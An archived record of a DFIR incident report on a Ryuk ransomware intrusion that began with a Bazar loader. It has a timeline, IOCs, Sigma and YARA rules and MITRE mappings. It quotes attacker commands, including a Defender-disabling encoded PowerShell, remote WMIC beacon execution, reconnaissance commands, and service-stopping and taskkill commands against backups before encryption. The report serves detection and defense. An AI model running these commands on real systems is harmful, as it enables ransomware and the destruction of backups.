{
	"id": "e2d7a86b-ede8-4107-88f2-d7b2dba5dd71",
	"created_at": "2026-04-06T00:20:14.759902Z",
	"updated_at": "2026-04-10T13:11:46.931782Z",
	"deleted_at": null,
	"sha1_hash": "3b496fa37a1d7a0f3a9480971f7cd95643956604",
	"title": "Ryuk's Return",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1648329,
	"plain_text": "Ryuk's Return\r\nBy editor\r\nPublished: 2020-10-08 · Archived: 2026-04-05 21:55:33 UTC\r\nIntro\r\nThe Ryuk group went from an email to domain-wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective.\r\nRyuk has been one of the most proficient ransomware gangs in the past few years, with the FBI claiming $61 million USD having been paid to the group as of February 2020. Earlier in the year, the group grew a little quiet, but that seems to have changed in the past few weeks, with incidents like what occurred at UHS hospitals.\r\nCase Summary\r\nIn this case, the actions began via a loader malware known as Bazar/Kegtap. Reports indicate an email delivery via malspam, which has been creeping up in volume over the month of September.\r\nFrom the initial execution of the payload, Bazar injects into various processes, including explorer.exe and svchost.exe, as well as spawning cmd.exe processes. The initial goal of this activity was to run discovery using built-in Windows utilities like nltest and net group, and the third-party utility AdFind.\r\nAfter the initial discovery activity, the Bazar malware stayed relatively quiet until a second round of discovery the following day. Again, the same tools were employed in the second round of discovery, plus Rubeus. This time the discovery collection was exfiltrated via FTP to a server hosted in Russia. Next, the threat actor began to move laterally.\r\nIt took a few attempts, using various methods, from remote WMI to remote service execution with PowerShell, until finally landing on Cobalt Strike beacon executable files transferred over SMB to move around the environment. 
From here forward, the threat actors relied on a Cobalt Strike beacon running on a domain controller as their main operations point.\r\nAfter picking the most reliable method to move through the environment, the threat actor then proceeded to establish beacons across the enterprise. In preparation for their final objectives, they used PowerShell to disable Windows Defender in the environment.\r\nThe server utilized for backups in the domain was targeted first for encryption, with some further preparation completed on the host. However, once the Ryuk ransom executable was transferred over SMB from their domain controller (DC) pivot, it only took one minute to execute it.\r\nAt this point Ryuk was transferred to the rest of the hosts in the environment via SMB and executed through an RDP connection from the pivot domain controller. In total, the campaign lasted 29 hours, from initial execution of the Bazar loader to domain-wide ransomware. If a defender missed the first day of recon, they would have had a little over 3 hours to respond before being ransomed.\r\nThe threat actors requested 600+ bitcoins, which have a market value of around 6+ million USD.\r\nTimeline\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 1 of 15\n\nFor a full breakdown of the technical details and threat actor tactics, techniques, and procedures, continue into the MITRE ATT\u0026CK breakdown.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial delivery was via email with a link to the Bazar/Kegtap backdoor loader. 
We downloaded and ran Document-Preview.exe, which connected to 5.182.210[.]145 over 443/https.\r\nExecution\r\nService execution was used several times to execute scripts and executables during lateral movement.\r\nWMI was used as well in an attempt to execute DLLs laterally.\r\nWMIC /node:\"DC.example.domain\" process call create \"rundll32 C:\\PerfLogs\\arti64.dll, StartW\"\r\nThe threat actors also performed process injection.\r\nDefense Evasion\r\nDisabling Windows Defender.\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAb\r\nDiscovery\r\nDay 1\r\nAdFind and adf.bat were dropped and run minutes after Document-Preview.exe was executed. We’ve seen adf.bat numerous times and you can read more about it here. The batch file outputs information into the following text files.\r\nNltest was used to check for domain trusts\r\nnltest /domain_trusts /all_trusts\r\nNet was used to show Domain Admins\r\nnet group \"Domain admins\" /DOMAIN\r\nPing was used to test if systems were up in the environment\r\nping hostname.domain.local\r\nBreakdown of the process tree of activity from the Bazar loader on day 1.\r\nDay 2\r\nAdFind was run again, and then the threat actor attempted to Kerberoast using Rubeus.\r\nAfter a few false starts during lateral movement failures, the threat actors performed some additional local system recon.\r\nsysteminfo\r\nnltest /dclist:\r\nGet-NetSubnet\r\nGet-NetComputer -operatingsystem *server*\r\nInvoke-CheckLocalAdminAccess\r\nFind-LocalAdminAccess\r\nWMI was used to check for the current antivirus on numerous systems\r\nWMIC /Node:localhost /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\r\nImport-Module ActiveDirectory; 
Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostNa\r\nLateral Movement\r\nOn day 1 the threat actors checked a domain controller for MS17-010 before continuing with more discovery. The system was not vulnerable to MS17-010.\r\nLateral movement began around 28 hours after initial entry, using SMB to drop a Cobalt Strike Beacon on a domain controller. From there, the threat actor used WMIC to execute the beacon.\r\nWMIC /node:\\\"DC.example.domain\\\" process call create \\\"rundll32 C:\\\\PerfLogs\\\\arti64.dll, StartW\\\"\r\nThis payload did not appear to run successfully: shortly after, with no command and control traffic apparent, the threat actors dropped an additional payload on the beachhead host and then executed a service on the DC.\r\nThe decoded PowerShell.\r\nFollowing this, the threat actors copied and executed a Cobalt Strike beacon executable and initiated it via a service on the domain controller.\r\nAt this point, C2 connections appear on the domain controller connecting to martahzz[.]com – 88.119.171[.]75 over 443/https. 
\r\nBackup systems were targeted for lateral movement using the executable transferred over SMB, which was executed around one hour after the first lateral movement execution from the beachhead host.\r\nThe threat actor was having issues running beacons on numerous systems, and on at least one of the systems, they mounted the drive remotely.\r\nC:\\Windows\\system32\\cmd.exe /C dir \\\\Server\\c$\r\nCommand and Control\r\nBazar:\r\n5.182.210.145|443\r\nCertificate [ec:4c:07:b8:3b:6a:a0:bf:60:36:b7:f4:92:9e:83:81:0f:96:46:b0 ]\r\nNot Before 2020/09/21 05:24:24 UTC\r\nNot After 2021/09/21 05:24:24 UTC\r\nIssuer Org Global Security\r\nSubject Common example.com\r\nSubject Org Global Security\r\nPublic Algorithm rsaEncryption\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCobalt Strike:\r\n88.119.171.75|443\r\nCertificate [ee:92:91:6b:7e:31:85:22:65:eb:16:11:c4:8f:0a:75:c9:05:1d:4b ]\r\nNot Before 2020/09/29 08:18:03 UTC\r\nNot After 2021/09/29 08:18:03 UTC\r\nIssuer Org lol\r\nSubject Common martahzz.com\r\nSubject Org lol\r\nPublic Algorithm rsaEncryption\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\n107.173.58.183|443\r\nCertificate [e2:13:2c:a4:29:ae:f3:fa:35:1f:e1:5b:2c:25:76:57:37:5b:dc:35 ]\r\nNot Before 2020/09/22 14:34:11 UTC\r\nNot After 2021/09/22 14:34:11 UTC\r\nIssuer Org lol\r\nSubject Common nomadfunclub.com\r\nSubject Org lol\r\nPublic Algorithm rsaEncryption\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nExfiltration\r\nDomain discovery (AdFind and Rubeus outputs) exfiltrated by vsftpd to 45.141.84[.]120.\r\nImpact\r\nSMB was used to transfer the Ryuk executables. RDP connections were then made from the first compromised DC, and ransomware was executed throughout the environment, starting with the backup servers. 
On the backup server, prior to execution, the threat actors pulled up the wbadmin MSC console.\r\nCommands run prior to ransom execution:\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"samss\\\"\" /y\"\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"veeamcatalogsvc\\\"\" /y\"\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"veeamcloudsvc\\\"\" /y\"\r\n\"C:\\Windows\\system32\\net1 stop \\\"\"veeamdeploysvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"samss\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"veeamcatalogsvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"veeamcloudsvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\net.exe\\\"\" stop \\\"\"veeamdeploysvc\\\"\" /y\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlbrowser.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlceip.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlservr.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM sqlwriter.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.agent.configurationservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.brokerservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.catalogdataservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.cloudservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.manager.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.mountservice.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.service.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.uiserver.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.backup.wmiserver.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamdeploymentsvc.exe 
/F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamfilesysvsssvc.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeam.guest.interaction.proxy.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamnfssvc.exe /F\"\r\n\"C:\\Windows\\System32\\taskkill.exe\\\"\" /IM veeamtransportsvc.exe /F\"\r\n\"C:\\Windows\\system32\\taskmgr.exe\\\"\" /4\"\r\n\"C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding\"\r\n\"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding\"\r\n\"icacls \\\"\"C:\\*\\\"\" /grant Everyone:F /T /C /Q\"\r\n\"icacls \\\"\"D:\\*\\\"\" /grant Everyone:F /T /C /Q\"\r\nAll systems were left with the following ransom note:\r\nThe threat actors asked for more than $6 million but were willing to negotiate.\r\nEnjoy our report? Please consider donating $1 or more to the project using Patreon. Thank you for your support!\r\nWe also have PCAPs, files, memory images, Kape and Redline packages available 
here.\r\nIOCs\r\nhttps://otx.alienvault.com/pulse/5f7f039322d638212355d28a\r\nhttps://misppriv.circl.lu/events/view/79958\r\nNetwork\r\n5.182.210.145\r\n88.119.171.75\r\n107.173.58.183\r\n45.141.84.120\r\nnomadfunclub.com\r\nmartahzz.com\r\n.bazar\r\nFile\r\nDocument-Preview.exe\r\n40b17d4ca83f079cf6b2b09d7a7fd839\r\n090e82a47b32dc94d71d4c84a3a76d2480589b00\r\n85ef348d39610c1d5f58e2524c0e929ec815a9fbe1f5924cdef7a0c05e58e5ad\r\nc5af8f6ae345f453442a3bbe8189c42ad3c7d4d89231607f78a1b6f24173679e38ac08d26294f46de98358b0aa560f33be5708becd2a63\r\n6144:HF5dJ89Rl3FtuK0cuVxtIIOxK6xOMjKBxMkUcYBMcoPRxDu3fXtjpamF:HFp4Rl36KNoxwxNmBWcYBhdlpF\r\nfx16_multi_for_crypt_x86.exe\r\nfc9f8bf3fcae4bf65150bff296b5e271\r\n308261d2539dba9814aa28c458970beb00cc2864\r\nf7998c8b083b31e8b0e8eaf197f6db65b100d44d94700e0780e81c7d54eefcf5\r\n4f60d3a0ca16242a3916675f93d16ee29f423d46deef81cad6da32c325d261cf204e94baf958383305dd3df33900d913676fd104c70a4c\r\n3072:AWh32QAodpLae6PEd0YstWTWlbkPn3aT3TFw:Jh32QAod5ae6P9YstVr\r\narti64.dll\r\nfc646e042c545be6f7e5bdcb3ecf64c7\r\nb5cdf571944f889e4369329aa01376e2204c01f0\r\nf22449c01f8233ea7c85a49f2b6b5fedd304fca5c0e58176bafda9218873c2dd\r\n8ddc48f4c5db09fc60053554487708fa5226e253edb64ace9e6fa0c3ea370df1bfd8e994cab0822feac494d71d7d730926738c902b3788\r\n6144:4MB168YZHFXFxaSjx9nDPAhgaa0rEAmrSWLeLITo0:4MB168UlraSzrAhY+EAwSp0\r\nP64.exe\r\n9ff18f7a19e06b602e19b9e0aca3ad84\r\nbcbb5bbc55b4f44397c34e9fca2017587e69219b\r\n9d8cbb2bf4801276de2143ccd64a7d0f66263809a90bea0b664282a15d121d9e\r\n157b06e75a3977e80866058111768508c643ccea681cf324d770865b3b1d354e233088b2391020f2e988f650344e263e8b9b0fcbc8c70a\r\n6144:Y52fXQtuKHZg9i/uu3cJfWCcIzZzvvnpPWyxXf7uByC:YmQtuKHP/AJuKZvVWmicadf.bat\r\nadf.bat\r\nb94bb0ae5a8a029ba2fbb47d055e22bd\r\n035940bd120a72e2da1b6b7bb8b4efab46232761\r\nf6a377ba145a5503b5eb942d17645502eddf3a619d26a7b60df80a345917aaa2\r\na8e5b535711268a0b82988259fbedc0211e0e55b5bf2d16ddcc21dae82f0312e178faee1b39ebec7fba5db4e36d9ad9618eae5c3a39a35\r\n6:81ykqi23fVxJfke9Nm0Lal9c9Nmw+IFc9NQ0LbyqAc9NCR+KsEc9NamWM5c9Nm0e:KqZxiZlpBIG21sSmz8yT1V\r\nDetections\r\nNetwork\r\nET INFO Observed DNS Query for EmerDNS_TLD (.bazar)\r\nETPRO POLICY Possibly Suspicious example.com SSL Cert\r\nET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)\r\nETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)\r\nFeodo Tracker: potential TrickBot CnC Traffic_detected\r\nET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB2 NT Create AndX Request For an Executable File In a Temp Directory\r\nET POLICY RunDll Request Over SMB - Likely Lateral Movement\r\nGPL NETBIOS SMB-DS IPC$ share access\r\nET CNC Feodo Tracker Reported CnC Server TCP group 15\r\nET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)\r\nET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (MSF style)\r\nET POLICY Command Shell Activity Over SMB - Possible Lateral 
Movement\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_powershell_suspicious_parameter_variation.yml\r\nhttps://github.com/Neo23x0/sigma/blob/82cae6d63c9c2f6d3e86c57e11497d86279b9f95/rules/windows/process_creation/win_susp_wmi_ex\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/other/win_defender_disabled.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/malware/win_mal_ryuk.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/powershell/powershell_shellcode_b64.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_whoami.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_whoami_as_system.yml\r\nDetects AdFind usage from a past case:\r\ntitle: AdFind Recon\r\ndescription: Threat Actor using AdFind for reconnaissance.\r\nauthor: The DFIR Report\r\ndate: 2019/8/2\r\nreferences:\r\n  - https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\ntags:\r\n  - attack.remote_system_discovery\r\n  - attack.T1018\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection_1:\r\n    CommandLine|contains:\r\n      - adfind -f objectcategory=computer\r\n  selection_2:\r\n    CommandLine|contains:\r\n      - adfind -gcb -sc trustdmp\r\n  condition: selection_1 or selection_2\r\nfalsepositives:\r\n  - Legitimate Administrator using tool for Active Directory querying\r\nlevel: medium\r\nstatus: 
experimental\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2020-10-04\r\nIdentifier: exes\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule ryuk_exes_P64 {\r\nmeta:\r\ndescription = \"exes - file P64.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"9d8cbb2bf4801276de2143ccd64a7d0f66263809a90bea0b664282a15d121d9e\"\r\nstrings:\r\n$s1 = \"MultiReco.exe\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"B:\\\\x64\\\\cpp\\\\x64\\\\Release\\\\MultiReco.pdb\" fullword ascii\r\n$s4 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s5 = \"`template-parameter-\" fullword ascii\r\n$s6 = \"Error initializing the common controls.\" fullword wide\r\n$s7 = \"Error reading data from the file.\" fullword wide\r\n$s8 = \"operator\u003c=\u003e\" fullword ascii\r\n$s9 = \"operator co_await\" fullword ascii\r\n$s10 = \"AppPolicyGetWindowingModel\" fullword ascii\r\n$s11 = \"AppPolicyGetShowDeveloperDiagnostic\" fullword ascii\r\n$s12 = \"noexcept\" fullword ascii\r\n$s13 = \"Error opening the file!\" fullword wide\r\n$s14 = \"Error creating the window\" fullword wide\r\n$s15 = \"Error creating new stroke collection.\" fullword wide\r\n$s16 = \"Failed connect to the recognition context's event source.\" fullword wide\r\n$s17 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s18 = \"Failed to add the strokes to the Ink object's custom stroke collection\" fullword wide\r\n$s19 = \"Failed to attach the stroke collection to the recognition context\" fullword wide\r\n$s20 = \"Error loading ink object from the file.\" fullword wide\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"c30bbd53e939306589cfb6ee8f94434f\" and 
pe.exports(\"SDqwsgrfTRRADQDSwatuHdfCxv\") or all of th\r\n}\r\nrule ryuk_exes_arti64 {\r\nmeta:\r\ndescription = \"exes - file arti64.dll\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"f22449c01f8233ea7c85a49f2b6b5fedd304fca5c0e58176bafda9218873c2dd\"\r\nstrings:\r\n$s1 = \"PluginSample.dll\" fullword ascii\r\n$s2 = \"B:\\\\x32\\\\dll\\\\x64\\\\Release\\\\PluginSample.pdb\" fullword ascii\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"AcquireSamplePlugin::DisplayConfigureDialog\" fullword wide\r\n$s5 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s6 = \"`template-parameter-\" fullword ascii\r\n$s7 = \"operator\u003c=\u003e\" fullword ascii\r\n$s8 = \"operator co_await\" fullword ascii\r\n$s9 = \"AppPolicyGetWindowingModel\" fullword ascii\r\n$s10 = \"Transfer Completed Successfully!\" fullword wide\r\n$s11 = \"AppPolicyGetShowDeveloperDiagnostic\" fullword ascii\r\n$s12 = \"noexcept\" fullword ascii\r\n$s13 = \"Read-Only Photo Acquire Plugin\" fullword wide\r\n$s14 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s15 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Photo Acquisition\\\\Plugins\\\\%ws\" fullword wide\r\n$s16 = \".?AUIUserInputString@@\" fullword ascii\r\n$s17 = \"CLSID\\\\%ws\\\\InprocServer32\" fullword wide\r\n$s18 = \"`generic-type-\" fullword ascii\r\n$s19 = \"e\u003e_eUsEi+H\u003cCc%RZtSC7QIt*HvDb68Pj3\" fullword ascii\r\n$s20 = \"Default Plugin Text\" fullword wide\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"0fd22f187f22ab4ec2eb55f91ccefa7a\" and ( pe.exports(\"StartW\") and pe.exports(\"TREWDGGegrfgye\r\n}\r\nrule ryuk_fx16_multi_for_crypt_x86 {\r\nmeta:\r\ndescription = \"exes - file fx16_multi_for_crypt_x86.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = 
\"f7998c8b083b31e8b0e8eaf197f6db65b100d44d94700e0780e81c7d54eefcf5\"\r\nstrings:\r\n$s1 = \"LuxIsnXwkvavqUaBlcqjWmmutckYHRjvSmOKvtRMwvSKnQMiJqUoYEcMzIANnFlVcyliOfiiaTsMnNWaNDDONiTDSmFdkCUOhbbwDEt\r\n$s2 = \"TYthgQVhYkfpnSlftPAzcdzAqVSlhPTZHjIthwkQuhrUvkIDilbaqJbwDZbiXcgGuIDIhJeCGXdfluoqjoelRuZNFWqNIPBiOgpChjN\r\n$s3 = \"IEOffhhLBexvIlCbvoQaZljxwWNMTczTsCUzgDpMsHSPyQIttHUgFUPadSIhtBYFrQNAKZiSvJglfknwqRoUxuuxWCwCwnQyVPAPhgl\r\n$s4 = \"fVHNcZJdHEkcoMdCUvMUMRzbsdjHdGdTFmIoZXWDQHBQNYzPNEiAjdsYtHBlIxyoWwSoDVwnfFTXxZGBUpsegUPrEANCvrQCzqCFQbc\r\n$s5 = \"cXuNyWQgbFQlughZovoZDwAHHWvWqeZlfFKFKfxwAmWWlHOpKoSdnbPehKrooTcWjrYuZJjVAYkxMVwuBLkaFVpdnsJeQZvEmoJchvj\r\n$s6 = \"sjDUCMurdFjEkVRmOZHRYtajSNmSgxfmnvUnJmJgDGGsqEOeCADepuzBzinLnjnAfiZWzVrWstXexwCczXQwTpxzeXAhJTByziBxWCY\r\n$s7 = \"GgcaduyeETNVsnybynUUywlxcoamtRlealYeLGXbpXBDTEJYavXdJAryMLCsZKrffWnBgAdGhLxqrgRebcImIXNEafCYCgEtaXsWdWi\r\n$s8 = \"ixtoVSYMk@dzN`TJ\\\\vtGVyqa|P{YGow|%\" fullword ascii\r\n$s9 = \"`w@p]H`suAVER\\\\~l^sG\" fullword ascii\r\n$s10 = \"Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3\" fullword ascii\r\n$s11 = \"\\\"YIWKqFIIAtSmNnwAnddonItdsMfDKcuoHBBWdeTMCFrlJJEFJzRIlaHAxjdKiWQkAnlaGHbAlIk}*1}TqVzGTDaqlaDozCvbwgtl\r\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\r\nPage 13 of 15\n\n$s12 = \"OhqMCeeltSHDtTWKtVLmEURx'kz y\\\"7\" fullword ascii\r\n$s13 = \"FrystFsgcteIaui\" fullword ascii\r\n$s14 = \"JJaZFfGMWkYZvWZVgeqjvEBRIOmpsPZnmqGtsbupUOlsQicTzEmJbveDkpsVrglajErQAxMvSxFydAdbEPwlBqDgZyBPTIGtmkHiVm\r\n$s15 = \"HiaqQCPQHIAFgVRMdAUUmtLWGbUVlQRcTWvjUBTLYpoEHeBDNWCMIlBrjIsSlNmHWUKjMFeEkPJkeGftHCUVKGwLckfhIYNcNhXudK\r\n$s16 = \"FrystDdswirfCqovf{vD\" fullword ascii\r\n$s17 = \"QvehbLauVGuTdFKhOKGSIwAgBxTFhkGiZRyBVMqFXKegVZQPPOQdrrZwuNewAYNzDiznmhdgyiovipThWdtgnIldoRbAaaIXUbmtlR\r\n$s18 = \"nFDnFOWGPuHyRcKShALUFIaVlXXwURYhHjhnRpCOuupuuBaIKJDbcbeAjHlojxJHKLrkQMmVvLSiLbRUBFigsUWkXCYiXstkJLZOJh\r\n$s19 = 
\"CtJHYQXcJSNgHqnKRdZhxKPMQvZYXQZsgrwtQStObwzMfbjjyaXlDNoxVclplvGxkoQlIKsSJZOVRJzlxaMrMCkoodjKxHuGbgXhEz\r\n$s20 = \"`EwSCLyaEZUPQuJBXob\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 400KB and\r\n( pe.imphash() == \"2ce62b0c0226079a88a01c701dbee7b9\" or 8 of them )\r\n}\r\nrule ryuk_Document_Preview {\r\nmeta:\r\ndescription = \"exes - file Document-Preview.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2020-10-04\"\r\nhash1 = \"85ef348d39610c1d5f58e2524c0e929ec815a9fbe1f5924cdef7a0c05e58e5ad\"\r\nstrings:\r\n$s1 = \"MultiReco.exe\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"Error initializing the common controls.\" fullword wide\r\n$s4 = \"Error reading data from the file.\" fullword wide\r\n$s5 = \"operator\u003c=\u003e\" fullword ascii\r\n$s6 = \"operator co_await\" fullword ascii\r\n$s7 = \"Error opening the file!\" fullword wide\r\n$s8 = \"Error creating the window\" fullword wide\r\n$s9 = \"Error creating new stroke collection.\" fullword wide\r\n$s10 = \"Failed connect to the recognition context's event source.\" fullword wide\r\n$s11 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s12 = \"Failed to attach the stroke collection to the recognition context\" fullword wide\r\n$s13 = \"Failed to add the strokes to the Ink object's custom stroke collection\" fullword wide\r\n$s14 = \"Error loading ink object from the file.\" fullword wide\r\n$s15 = \"You need to have at least one in order to run this sample.\" fullword wide\r\n$s16 = \"Failed to create a unique string id for the stroke collection\" fullword wide\r\n$s17 = \"Recognition has failed. 
No results will be stored in the stroke collection.\" fullword wide\r\n$s18 = \"*- *[Cv\" fullword ascii\r\n$s19 = \"ggDeA08\" fullword ascii\r\n$s20 = \"qtwmuy2\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() == \"274676f64ec63375a7825a17a44cba07\" and pe.exports(\"SDqwsgrfTRRADQDSwatuHdfCxv\") or 8 of them )\r\n}\r\nIf you have detections you would like to add to this section, please contact us and we will credit you.\r\nMITRE\r\nUser Execution – T1204\r\nWindows Management Instrumentation – T1047\r\nService Execution – T1035\r\nScripting – T1064\r\nPowerShell – T1086\r\nRundll32 – T1085\r\nProcess Injection – T1055\r\nValid Accounts – T1078\r\nDisabling Security Tools – T1089\r\nAccount Discovery – T1087\r\nDomain Trust Discovery – T1482\r\nNetwork Service Scanning – T1046\r\nQuery Registry – T1012\r\nRemote System Discovery – T1018\r\nSecurity Software Discovery – T1063\r\nRemote Services – T1021\r\nCommonly Used Port – T1043\r\nStandard Application Layer Protocol – T1071\r\nData Encrypted for Impact – T1486\r\n(internal case 1005)\r\nSource: https://thedfirreport.com/2020/10/08/ryuks-return/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2020/10/08/ryuks-return/"
	],
	"report_names": [
		"ryuks-return"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434814,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b496fa37a1d7a0f3a9480971f7cd95643956604.pdf",
		"text": "https://archive.orkl.eu/3b496fa37a1d7a0f3a9480971f7cd95643956604.txt",
		"img": "https://archive.orkl.eu/3b496fa37a1d7a0f3a9480971f7cd95643956604.jpg"
	}
}